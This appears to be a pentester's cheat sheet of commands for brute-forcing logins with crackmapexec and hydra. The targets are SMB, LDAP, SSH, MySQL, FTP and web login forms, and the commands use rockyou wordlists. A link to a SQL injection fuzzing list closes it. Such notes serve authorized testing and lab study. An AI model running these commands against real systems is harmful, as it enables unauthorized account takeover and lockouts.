# bruteforcing creds

# crackmapexec

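crackmapexec examples (each username/password pair is a real logon attempt: the target typically logs it, and it counts toward any account lockout threshold)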

crackmapexec <protocol> <target(s)> -u username -p password               # generic example
crackmapexec <protocol> <target(s)> -u username1 -p password1 password2   # multiple passwords
crackmapexec <protocol> <target(s)> -u username1 username2 -p password1   # multiple usernames
crackmapexec <protocol> <target(s)> -u ~/file_containing_usernames -p ~/file_containing_passwords

available protocols {ldap,smb,ssh,winrm,mssql}

    ldap                own stuff using ldap
    smb                 own stuff using SMB
    ssh                 own stuff using SSH
    winrm               own stuff using WINRM
    mssql               own stuff using MSSQL

# hydra

# hydra Examples

hydra -L users.list -P /usr/share/wordlists/rockyou.txt example.box mysql                              # Bruteforce mysql for a list of users
hydra -t 4 -l mike -P /usr/share/wordlists/rockyou.txt 10.10.10.10 ftp                                 # Bruteforce ftp for user mike using 4 threads
hydra -t 4 -l john -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou-60.txt 10.10.10.10 ssh    # Bruteforce ssh for user john using 4 threads

# hydra web forms

sudo hydra <Username/List> <Password/List> <IP> <Method> "<Path>:<RequestBody>:<IncorrectVerbiage>"   # <IncorrectVerbiage> = text the application returns on a failed login
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.10 http-post-form "/login.php:username=admin&password=^PASS^:Invalid username"
# on another port, set with -s (in this case jenkins on port 8080)
hydra -l admin -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou-60.txt 10.10.10.10 -s 8080 http-post-form "/j_acegi_security_check:j_username=admin&j_password=^PASS^:Invalid username"

# SQL injection

SQLi list for fuzzing with burpsuite intruder: https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/sql-injection/detect/xplatform.txt